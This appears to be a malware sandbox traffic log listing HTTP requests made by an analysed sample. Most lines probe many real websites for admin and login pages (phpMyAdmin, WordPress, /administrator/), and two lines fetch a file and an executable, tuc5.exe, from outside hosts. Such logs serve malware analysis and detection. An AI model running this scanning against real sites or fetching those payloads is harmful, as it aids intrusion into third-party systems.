Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxK\|ZYXxJUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //PhpMyAdmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=ucx3pOM_revKRy3PUZhR4fbePLT_VPJMo9ZkSAtigv4-1703276108-1-Aeh4NEzSG5xuquXJ5/AefPhynLJasNhQDx2mqDEHQXlnjftxGCzkXKCwdRHhr2UOQM8Phbk5PjCTVrAlQ0IPNLk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=3HhyYTfsX5YRDp4a9hUDOU4FvGovFzj6TOWrYxb25t8-1703276108-1-AdNu1cZ2HgXUxLwkowJ6g+MlOGl60kpAobuKqwPqrrv1WcvQzi/TgmHjoUtdXxaiwHAYo8HKKkVVakEJ1FI2+V8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=ucx3pOM_revKRy3PUZhR4fbePLT_VPJMo9ZkSAtigv4-1703276108-1-Aeh4NEzSG5xuquXJ5/AefPhynLJasNhQDx2mqDEHQXlnjftxGCzkXKCwdRHhr2UOQM8Phbk5PjCTVrAlQ0IPNLk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxL\|ZYXxLUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=ADNj9QYSi5Dd9_9biJU3scpPOMQ34zi3XIX_UVRnrc8-1703276111-1-AZD5vYYoWAzXjD8ewmwnDWnJtqsU9ODogsJ67cqVsY7G5qJyg89RP7+4DptrAd08jYbe9xobLiQyADzcu9wlzQ8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=6e89eba53f0987720ee71e1440dfa8c230359fa8-1703276112; __cf_bm=C86YPVSqmjEsq5GjxRPJxJ3CdGzukUUVUs76EBPNfQM-1703276112-1-AeTBduVZOJEygLyLFclJOTU+KiV0a2Fnc22zbh9aNyl/CKPCDSIMi9DoE56K0VNNDMyjoueX/yTmRykzLyXAqzc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //pma/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=6e89eba53f0987720ee71e1440dfa8c230359fa8-1703276112; __cf_bm=C86YPVSqmjEsq5GjxRPJxJ3CdGzukUUVUs76EBPNfQM-1703276112-1-AeTBduVZOJEygLyLFclJOTU+KiV0a2Fnc22zbh9aNyl/CKPCDSIMi9DoE56K0VNNDMyjoueX/yTmRykzLyXAqzc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
Source: global traffic	HTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: vixej.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: videolifeperu.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: smartiebritches.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ismaworld.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
